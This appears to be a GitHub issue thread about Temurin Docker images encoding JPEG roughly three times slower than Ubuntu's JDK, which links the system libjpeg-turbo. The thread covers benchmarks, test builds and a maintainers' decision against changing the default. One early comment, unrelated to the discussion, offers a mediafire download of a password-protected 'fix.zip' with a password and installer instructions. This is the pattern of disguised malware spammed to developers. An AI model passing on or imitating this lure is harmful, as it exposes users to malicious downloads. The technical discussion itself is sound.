### ISSUE TITLE
[Bug]: JPEG encoding much slower (3x) compared to base image JDK

### ISSUE THREAD

**Issue by aaime** [adoptium/containers#641]
### Please add the exact image (with tag) that you are using

clipse-temurin:11-jdk-noble

### Please add the version of Docker you are running

Docker version 25.0.0, build e758fe5

### What happened?

The Temurin JDK embedded in the docker images is significantly slower at encoding JPEG images compared to the native Java from the same distribution.

Here is the reference benchmark, which prepares a large-ish image and then encodes is in JPEG (ends in txt as Github is not happy attaching .java files):
[JPEGEncodingBenchmark.java.txt](https://github.com/user-attachments/files/16749313/JPEGEncodingBenchmark.java.txt)

Put it in a directory (I've called it "turbo") and then run the following:

```
docker run -it -u 0 -v ./turbo:/root/turbo -w /root/turbo --rm  eclipse-temurin:11-jdk-noble  /bin/bash
```

Note, I'm running as root so that it's easy to install the distribution java packages later.
Now, run the benchmark:

```
> java JPEGEncodingBenchmark
JDK Runtime: OpenJDK Runtime Environment
JDK Version: 11.0.24
JDK Runtime Version: 11.0.24+8
Total time: 92013.26 ms
Average time per image: 920.13 ms
```

Now, let's install the distribution own jdk instead, and run the benchmark again:

```
> apt-get install openjdk-11-jdk-headless
> /usr/lib/jvm/java-11-openjdk-amd64/bin/java JPEGEncodingBenchmark
JDK Runtime: OpenJDK Runtime Environment
JDK Version: 11.0.24
JDK Runtime Version: 11.0.24+8-post-Ubuntu-1ubuntu324.04.1
Total time: 27485.55 ms
Average time per image: 274.86 ms
```

One can get the same results for Java 17 and Java 21, using the respective images and default native packages. 
Here are the results for Java17:

```
> java JPEGEncodingBenchmark
JDK Runtime: OpenJDK Runtime Environment
JDK Version: 17.0.12
JDK Runtime Version: 17.0.12+7
Total time: 90165.67 ms
Average time per image: 901.66 ms
...
> /usr/lib/jvm/java-17-openjdk-amd64/bin/java JPEGEncodingBenchmark
JDK Runtime: OpenJDK Runtime Environment
JDK Version: 17.0.12
JDK Runtime Version: 17.0.12+7-Ubuntu-1ubuntu224.04
Total time: 27649.54 ms
Average time per image: 276.50 ms
```
And for Java 21:

```
> java JPEGEncodingBenchmark
JDK Runtime: OpenJDK Runtime Environment
JDK Version: 21.0.4
JDK Runtime Version: 21.0.4+7-LTS
Total time: 86537.04 ms
Average time per image: 865.37 ms
...
/usr/lib/jvm/java-21-openjdk-amd64/bin/java JPEGEncodingBenchmark
JDK Runtime: OpenJDK Runtime Environment
JDK Version: 21.0.4
JDK Runtime Version: 21.0.4+7-Ubuntu-1ubuntu224.04
Total time: 27256.41 ms
Average time per image: 272.56 ms
```

In other words, it's more than 3 times faster.
I believe the reason for this is that Temurin is running against the internal JPEG library, whilst the Ubuntu takes advantage the system libjpeg library, [which has long been "libjpeg-turbo"](https://lists.debian.org/debian-devel-announce/2014/08/msg00000.html), a performance-optimized version of libjpeg.

Now, integrating turbo-jpeg into the OpenJDK would probably be better, but might also take a lot of time. Ubuntu/Debian have solved the issue at build time, linking to OS libraries. Could Adoptium do the same, while packaging the docker images, and thus knowing exactly the capabilities of the target operating system?

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by karianna** [comment]
@aaime - I think this would go beyond containers - applicable to VMs as well?

**Comment by aaime** [comment]
When you say VMs, you mean Java Virtual Machines? I commented about it above "integrating turbo-jpeg into the OpenJDK would probably be better, but might also take a lot of time". I'm speaking based on the experience with the Marlin renderer integration ([it took years](https://github.com/bourgesl/marlin-renderer?tab=readme-ov-file#news), I know I don't have the spare cycles to go through that). 

I'm not into building OpenJDK from sources, but with a cursory look, it seems the important difference is that they ask to use the system libs for JPEG (and a few others) [here](https://sources.debian.org/src/openjdk-11/11.0.24%2B8-2/debian/rules/#L507) while the [Temurin build does not](https://github.com/adoptium/temurin-build/blob/master/build-farm/platform-specific-configurations/linux.sh).

Now, I guess that building with those flag, and generating something that would be downladable from adoptium.net, for any Linux distribution, is calling for trouble: too much variation in the target installation platforms.
However, when building the docker images, you know exactly what the target is, and it would be safer.

**Comment by karianna** [comment]
Right, so this would be applicable to a bare meta or VM installation of Debian.

**Comment by aaime** [comment]
In the meantime, I've done a quick test on Alpine as well and got the same result, the distribution JDK has the same performance as the Ubuntu one (3x faster than Temurin).

**Comment by sxa** [comment]
> However, when building the docker images, you know exactly what the target is, and it would be safer.

Yes but it would still require a separate build of the JDK do be done. We currently only build the JDK once for each platform and put the images in from that. We would be required to do additional testing if we were to build it separately with different options. As you suggest, pushing it upstream would almost certainly be the correct route here (Bear in mind that Temurin, as a distribution, generally avoids adding any patches into the build itself over and above what's in the standard upstream openjdk codebase).

It's interesting that there is such a big difference though and that Debian/Ubuntu have chosen to make use of it.

I'll see if I can create a one-off build to see how it behaves.

Noting for my own purposes that we don't have libjpeg-devel in the build environments, so this cannot currentlly be built in the normal CI, although `libpng-devel` is there. Easy to fix with `yum install libjpeg-turbo-devel` before building.

Also noting that jdk8u does not have the options to use the system libraries: `configure: error: unrecognized options: --with-libpng, --with-libjpeg`

**Comment by sxa** [comment]
Note: These links should not be considered permanent as I don't plan to leave them around for ever, but they are Linux/x64 builds with `CONFIGURE_ARGS="--with-libpng=system --with-libjpeg=system"`. They are also `xz` rather than `gz` to save space on our server:
- [jdk21u-hotspot.tar.xz](https://ci.adoptium.net/userContent/641/jdk21u-hotspot.tar.xz)
- [jdk11u-hotspot.tar.xz](https://ci.adoptium.net/userContent/641/jdk11u-hotspot.tar.xz)

As expected based on your comments, these seem to give comparable speedups to what you are describing relative to a base Temurin 11.0.24+8, or 21.0.4+7 (Tested on CentOS)

```
JDK Runtime: OpenJDK Runtime Environment
JDK Version: 11.0.25-beta
JDK Runtime Version: 11.0.25-beta+4-202408271022
Total time: 47034.34 ms
Average time per image: 470.34 ms
```
```
JDK Runtime: OpenJDK Runtime Environment
JDK Version: 11.0.24
JDK Runtime Version: 11.0.24+8
Total time: 113206.75 ms
Average time per image: 1132.07 ms
```
```
JDK Runtime: OpenJDK Runtime Environment
JDK Version: 21.0.5-beta
JDK Runtime Version: 21.0.5-beta+4-202408271008
Total time: 43815.90 ms
Average time per image: 438.16 ms
```
```
JDK Runtime: OpenJDK Runtime Environment
JDK Version: 21.0.4
JDK Runtime Version: 21.0.4+7-LTS
Total time: 107145.05 ms
Average time per image: 1071.45 ms
```
Interestingly not quite the 3x speedup you got but we're on different hardware and I don't know if there may be other changes in the Ubuntu build of the JDK or libjpeg-turbo that might be giving a little more performance (Those versions of libjpeg-turbo were likely more backlevel than yours). Feel free to try those builds and report back on your system :-)

**Comment by aaime** [comment]
I've tried both locally and inside the Temurin Noble Docker image, keep on getting these failures:

```
root@73c60581f296:~/turbo# ../jdk-11.0.25+4/bin/java JPEGEncodingBenchmark
JDK Runtime: OpenJDK Runtime Environment
JDK Version: 11.0.25-beta
JDK Runtime Version: 11.0.25-beta+4-202408271022
Exception in thread "main" java.lang.UnsatisfiedLinkError: /root/jdk-11.0.25+4/lib/libjavajpeg.so: libjpeg.so.62: cannot open shared object file: No such file or directory
```

Locally I have a /usr/lib/libjpeg.so.9, for reference.

**Comment by sxa** [comment]
> Locally I have a /usr/lib/libjpeg.so.9, for reference.

OK thanks - it does mean it wouldn't be a simple fix to make it work on all systems if we wanted to make such a change.

As a test I also tried symlinking `libjpeg.so.8` to `.62` on an Ubuntu system but that doesn't work either as it can't find `LIBJPEG_6.2` which it's looking for in the library so it does seem to be producing something that requires a specific version. Noting that my system has libjpeg-turbo 1.2.1, Ubuntu seems to have 2.1.5 in libjpeg-turbo8.

**Comment by sxa** [comment]
This was discussed at the last Adoptium PMC meeting and it was considered unsuitable for use as a default due to the difficulty of providing a single build which would run on all distributions which we currently support.

If there was a desire to persue this (and I can see good reasons for doing so given the potential performance gains) it would likely require the suggestion to use libjpeg-turbo to be proposed upstream, or otherwise modify the openjdk codebase to detect and use a suitable version at runtime.
